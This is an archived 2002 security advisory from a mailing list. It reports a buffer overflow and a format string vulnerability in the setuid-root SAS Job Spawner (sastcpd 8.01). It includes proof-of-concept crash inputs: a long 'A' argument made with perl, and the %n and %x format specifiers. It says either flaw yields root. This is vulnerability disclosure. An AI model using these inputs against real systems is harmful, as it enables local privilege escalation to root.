|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Wodahs Latigid (wodahs
mail.com)Date: Tue Jan 29 2002 - 03:59:41 CST
----------------------------------------------------------
sastcpd Buffer Overflow and Format String Vulnerabilities
Ministry-of-Peace - www.ministryofpeace.co.uk
----------------------------------------------------------
SYNOPSIS
"SAS software provides the foundation, tools, and
solutions for data analysis, report generation,
and enterprise-wide information delivery."
The "SAS Job Spawner", sastcpd, contains both a buffer
overflow and a format string vulnerability.
SAS Support say that these problems were fixed in version
8.2 of this product, but we are unable to confirm as we
do not have access to this version.
IMPACT
sastcpd is installed setuid root by default, and therefore
full root privileges can be obtained through exploitation
of either of these vulnerabilities.
DETAILS
Version tested:
SAS Job Spawner for Open Systems version 8.01
$ sastcpd `perl -e "print 'A' x 1200"`
Invalid argument: AAAA[..cut..]AAAA.
Segmentation fault (core dumped)
$ ls -la core
-rw------- 1 root teknix 1454382 Jan 28 04:22 core
$ sastcpd %n
Segmentation fault (core dumped)
$ sastcpd %x
Invalid argument: 2.
CREDITS
Vulnerability discovered by Digital Shadow
INFO
Security Advisory #05
Published: 29th January 2002
--_______________________________________________ Sign-up for your own FREE Personalized E-mail at Mail.com http://www.mail.com/?sr=signup
Win a ski trip! http://www.nowcode.com/register.asp?affiliate=1net2phone3a
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]